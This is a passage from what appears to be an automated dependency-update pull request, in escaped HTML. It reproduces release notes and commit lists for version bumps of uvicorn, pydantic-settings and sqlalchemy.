changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.49.0 (June 3, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003ehttptools\u003c/code\u003e minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (reverses the 0.48.0 behavior of ignoring them) (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.48.0 (May 24, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 14, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2920\"\u003e#2920\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2919\"\u003e#2919\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (April 23, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2915\"\u003e#2915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in \u003ccode\u003ewebsockets-sansio\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2917\"\u003e#2917\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.45.0 (April 21, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2912\"\u003e#2912\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2905\"\u003e#2905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2907\"\u003e#2907\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/3ef2e3e08e3d9ad9572800f8bc54f3eaed9eab0a\"\u003e\u003ccode\u003e3ef2e3e\u003c/code\u003e\u003c/a\u003e Version 0.49.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2973\"\u003e#2973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/eeb64b1d1c95a14096ed3313377c74b485f558fc\"\u003e\u003ccode\u003eeeb64b1\u003c/code\u003e\u003c/a\u003e Consume duplicate forwarding headers in ProxyHeadersMiddleware (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/630f4aca14e79183617c71be714030842a1041c5\"\u003e\u003ccode\u003e630f4ac\u003c/code\u003e\u003c/a\u003e Make the watchfiles reload tests deterministic (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2972\"\u003e#2972\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9154922e3730f7aba68ecc3ecbf536680ee8fd1c\"\u003e\u003ccode\u003e9154922\u003c/code\u003e\u003c/a\u003e chore(deps): bump the github-actions group across 1 directory with 6 updates ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/739727a1d80e468d1e47e98bbd824ee9e3c9554b\"\u003e\u003ccode\u003e739727a\u003c/code\u003e\u003c/a\u003e Migrate docs deploy from Cloudflare Pages to Workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2967\"\u003e#2967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/be4a240488d3fb678a11b8e8f83505266f5f1de7\"\u003e\u003ccode\u003ebe4a240\u003c/code\u003e\u003c/a\u003e Gate docs preview deploy on Cloudflare token presence (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2966\"\u003e#2966\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/c489d7e10dfe653a2bba914feedf2a632a026e6f\"\u003e\u003ccode\u003ec489d7e\u003c/code\u003e\u003c/a\u003e Bump httptools minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9f547bd82ef52bcba206e04170b359bd6daa25b3\"\u003e\u003ccode\u003e9f547bd\u003c/code\u003e\u003c/a\u003e Skip docs preview deploy for Dependabot PRs (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2961\"\u003e#2961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/44446b894e37ca76830d6aa83df4349795400ed4\"\u003e\u003ccode\u003e44446b8\u003c/code\u003e\u003c/a\u003e Migrate documentation from MkDocs Material to Zensical (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2959\"\u003e#2959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/cfd659c4f18b526adce9c255c96707bab20af40c\"\u003e\u003ccode\u003ecfd659c\u003c/code\u003e\u003c/a\u003e Bump pymdown-extensions to 10.21.3 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2958\"\u003e#2958\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.44.0...0.49.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic-settings` from 2.13.1 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic-settings/releases\"\u003epydantic-settings's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/850\"\u003epydantic/pydantic-settings#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 5 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/854\"\u003epydantic/pydantic-settings#854\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/853\"\u003epydantic/pydantic-settings#853\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/856\"\u003epydantic/pydantic-settings#856\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/858\"\u003epydantic/pydantic-settings#858\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare release 2.14.1 by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/859\"\u003epydantic/pydantic-settings#859\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\"\u003ehttps://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix parsing env vars into Optional Strict types by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/792\"\u003epydantic/pydantic-settings#792\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix RecursionError with mutually recursive models in CLI by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/794\"\u003epydantic/pydantic-settings#794\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix env_file from model_config ignored in CliApp.run() (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/795\"\u003e#795\u003c/a\u003e) by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/796\"\u003epydantic/pydantic-settings#796\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/798\"\u003epydantic/pydantic-settings#798\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/801\"\u003epydantic/pydantic-settings#801\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump samuelcolvin/check-python-version from 4.1 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/802\"\u003epydantic/pydantic-settings#802\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/upload-artifact from 4 to 7 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/803\"\u003epydantic/pydantic-settings#803\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/804\"\u003epydantic/pydantic-settings#804\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump astral-sh/setup-uv from 5 to 7 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/805\"\u003epydantic/pydantic-settings#805\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-python from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/806\"\u003epydantic/pydantic-settings#806\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore chardet and group GitHub Actions in Dependabot by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/808\"\u003epydantic/pydantic-settings#808\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/download-artifact from 4 to 8 in the github-actions group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/809\"\u003epydantic/pydantic-settings#809\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/810\"\u003epydantic/pydantic-settings#810\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport reading .env files from FIFOs (e.g. 1Password Environments) by \u003ca href=\"https://github.com/JacobHayes\"\u003e\u003ccode\u003e@​JacobHayes\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/776\"\u003epydantic/pydantic-settings#776\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix AliasChoices ignored when changing provider priority by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/813\"\u003epydantic/pydantic-settings#813\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: resolve KeyError in run_subcommand for underscore field names by \u003ca href=\"https://github.com/bradykieffer\"\u003e\u003ccode\u003e@​bradykieffer\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/799\"\u003epydantic/pydantic-settings#799\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/814\"\u003epydantic/pydantic-settings#814\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eLiteral[numeric Enum]\u003c/code\u003e coercion for CLI and env vars by \u003ca href=\"https://github.com/m9810223\"\u003e\u003ccode\u003e@​m9810223\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/811\"\u003epydantic/pydantic-settings#811\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix nested discriminated unions not discovered by env/CLI providers by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/816\"\u003epydantic/pydantic-settings#816\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/820\"\u003epydantic/pydantic-settings#820\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCLI ensure env nested max split internally. by \u003ca href=\"https://github.com/kschwab\"\u003e\u003ccode\u003e@​kschwab\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/821\"\u003epydantic/pydantic-settings#821\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/824\"\u003epydantic/pydantic-settings#824\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMigrate \u003ccode\u003eboto3-stubs\u003c/code\u003e to \u003ccode\u003etypes-boto3\u003c/code\u003e by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/831\"\u003epydantic/pydantic-settings#831\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix CLI not recognizing field name with validate_by_name and AliasChoices by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/826\"\u003epydantic/pydantic-settings#826\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAllow customisation of the dotevn setting source to filter variables by \u003ca href=\"https://github.com/CaselIT\"\u003e\u003ccode\u003e@​CaselIT\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/832\"\u003epydantic/pydantic-settings#832\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/833\"\u003epydantic/pydantic-settings#833\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIntroduce yamlfmt by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/836\"\u003epydantic/pydantic-settings#836\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump boto3 from 1.42.82 to 1.42.83 in the python-packages group by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/837\"\u003epydantic/pydantic-settings#837\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIntroduce zizmor by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/838\"\u003epydantic/pydantic-settings#838\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix CliPositionalArg[list[CustomType]] crash for custom types by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/839\"\u003epydantic/pydantic-settings#839\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd note about Mypy plugin for \u003ccode\u003eBaseSettings.__init__()\u003c/code\u003e by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/842\"\u003epydantic/pydantic-settings#842\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecli_ignore_unknown_args=True\u003c/code\u003e not working on subcommands by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/844\"\u003epydantic/pydantic-settings#844\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/847\"\u003epydantic/pydantic-settings#847\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix CLI descriptions lost under \u003ccode\u003epython -OO\u003c/code\u003e by falling back to \u003ccode\u003ejson_schema_extra\u003c/code\u003e by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/843\"\u003epydantic/pydantic-settings#843\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare release 2.14.0 by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/848\"\u003epydantic/pydantic-settings#848\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/e95c30bec8cfaee88ee275138c064aea97a25bdf\"\u003e\u003ccode\u003ee95c30b\u003c/code\u003e\u003c/a\u003e Prepare release 2.14.1 (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/859\"\u003e#859\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/0c8734581b6cf70a995afad603ac456631d00621\"\u003e\u003ccode\u003e0c87345\u003c/code\u003e\u003c/a\u003e Fix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/858\"\u003e#858\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/7bd0072795a800065b42210b6dca90fc9b83daf7\"\u003e\u003ccode\u003e7bd0072\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 2 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/856\"\u003e#856\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/b03e573d017ed48e1c2774a5e0b715db9766c76b\"\u003e\u003ccode\u003eb03e573\u003c/code\u003e\u003c/a\u003e Bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/853\"\u003e#853\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/eaa3b434938411ec8a3717ea646614561e713f51\"\u003e\u003ccode\u003eeaa3b43\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 5 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/854\"\u003e#854\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/9f95615c24c6813c1d7d203576581a79cb6d9e8e\"\u003e\u003ccode\u003e9f95615\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 4 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/850\"\u003e#850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/8916beeecc6d0510e3d0532a0ed839937400ddc3\"\u003e\u003ccode\u003e8916bee\u003c/code\u003e\u003c/a\u003e Prepare release 2.14.0 (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/848\"\u003e#848\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/39e551c0910c85505b608ff85a103b2c9f7396c5\"\u003e\u003ccode\u003e39e551c\u003c/code\u003e\u003c/a\u003e Fix CLI descriptions lost under \u003ccode\u003epython -OO\u003c/code\u003e by falling back to `json_schema_...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/9ed7f48ea2c90f436a03b01f721fe6656c869b14\"\u003e\u003ccode\u003e9ed7f48\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 4 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/847\"\u003e#847\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/617c690fb16c95eb0fb98fc88c0d6d82b9af4fa9\"\u003e\u003ccode\u003e617c690\u003c/code\u003e\u003c/a\u003e Fix \u003ccode\u003ecli_ignore_unknown_args=True\u003c/code\u003e not working on subcommands (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/844\"\u003e#844\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.13.1...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `sqlalchemy` from 2.0.49 to 2.0.50\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/releases\"\u003esqlalchemy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.0.50\u003c/h1\u003e\n\u003cp\u003eReleased: May 24, 2026\u003c/p\u003e\n\u003ch2\u003eorm\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.joinedload()\u003c/code\u003e with\n\u003ccode\u003ePropComparator.of_type()\u003c/code\u003e targeting a joined-table subclass combined\nwith \u003ccode\u003ePropComparator.and_()\u003c/code\u003e referencing a column on that subclass\nwould generate invalid SQL, where the subclass column was not adapted to\nthe subquery alias.  Pull request courtesy Joaquin Hui Gomez.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13203\"\u003e#13203\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where the presence of a 